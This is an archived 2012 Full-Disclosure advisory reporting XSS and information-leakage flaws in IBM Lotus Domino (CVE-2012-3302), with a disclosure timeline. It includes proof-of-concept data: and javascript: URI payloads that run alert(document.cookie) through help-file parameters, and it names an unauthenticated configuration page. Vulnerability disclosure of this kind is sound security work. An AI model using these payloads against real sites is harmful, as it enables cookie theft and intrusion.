lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <006601cd8935$3fcfafe0$9b7a6fd5@ml>
Date: Sun, 2 Sep 2012 21:02:11 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: XSS and IL vulnerabilities in IBM Lotus Domino

Hello list!

I want to warn you about Cross-Site Scripting and Information Leakage
vulnerabilities in IBM Lotus Domino. At 15th of August IBM released the
advisory concerning these Cross-Site Scripting vulnerabilities.

CVE ID: CVE-2012-3302.

-------------------------
Affected products:
-------------------------

Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. XSS
vulnerabilities will be fixed in Domino 8.5.4 and IBM are still working on
Information Leakage and other vulnerabilities, about which I've informed
them.

For fixes, workarounds and mitigations reference to IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160

----------
Details:
----------

XSS (WASC-08):

This XSS in March 2008 worked in such way:

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//

Since that time vector of attack via javascript: URI was fixed (it's quite
possible that my German client informed IBM in 2008 about multiple holes,
which I found in Domino). But there is a possibility to attack via data: and
vbscript: URI.

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Leakage (WASC-13):

At page https://site/domcfg.nsf, which is accessible without authentication,
there is a leakage of information about Web Server Configuration. Such
situation I saw at many sites on Lotus Domino.

------------
Timeline:
------------ 

- During 16.05-20.05 I've wrote announcements about multiple vulnerabilities
in IBM software at my site.
- During 16.05-20.05 I've wrote five advisories via contact form at IBM
site. No reaction from "IT security".
- At 20.05 I've contacted "Software support". Received formal answer.
- At 20.05 informed support, that this is security issues (not something
small, which they can just ignore) and they need to sent it to security
department. Again received formal answer - this time with "call me maybe"
paragraph. In result IBM employees just ignored.
- At 30.05 I've contacted IBM PSIRT directly. They said they didn't received
anything, not from me via contact form, nor from support. The same as they
didn't do anything (no security audit of their software) to make these
multiple vulnerabilities in multiple IBM software to go to the wild.
- At 31.05 I've resend five advisories, which they received and said they
would send them to the developers (of Lotus products).
- At 06.06, after silence from PSIRT, I've reminded them. They said there is
still no info from developers.
- At 10.07, after more then month of silence since last time from PSIRT,
I've reminded them. No answer from them. This looks like IBM developers have
decided to ignore these vulnerabilities.
- At 14.07 I've informed IBM PSIRT, that due to their ignoring I'd plan
public disclosure of these vulnerabilities on July.
- At 18.07, 12:06 AM, PSIRT answered (after 1,5 months of silence) and said
that previous day they had meeting with developers, which were working on
these issues, and they started to fix them. No concrete deadline, they just
started.
- At 15.08 IBM released their advisory (about Cross-Site Scripting and HTTP
Response Splitting holes - just few from total amount of holes).
- At 27.08.2012 I've disclosed these vulnerabilities (first advisory) at my
site (http://websecurity.com.ua/5826/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ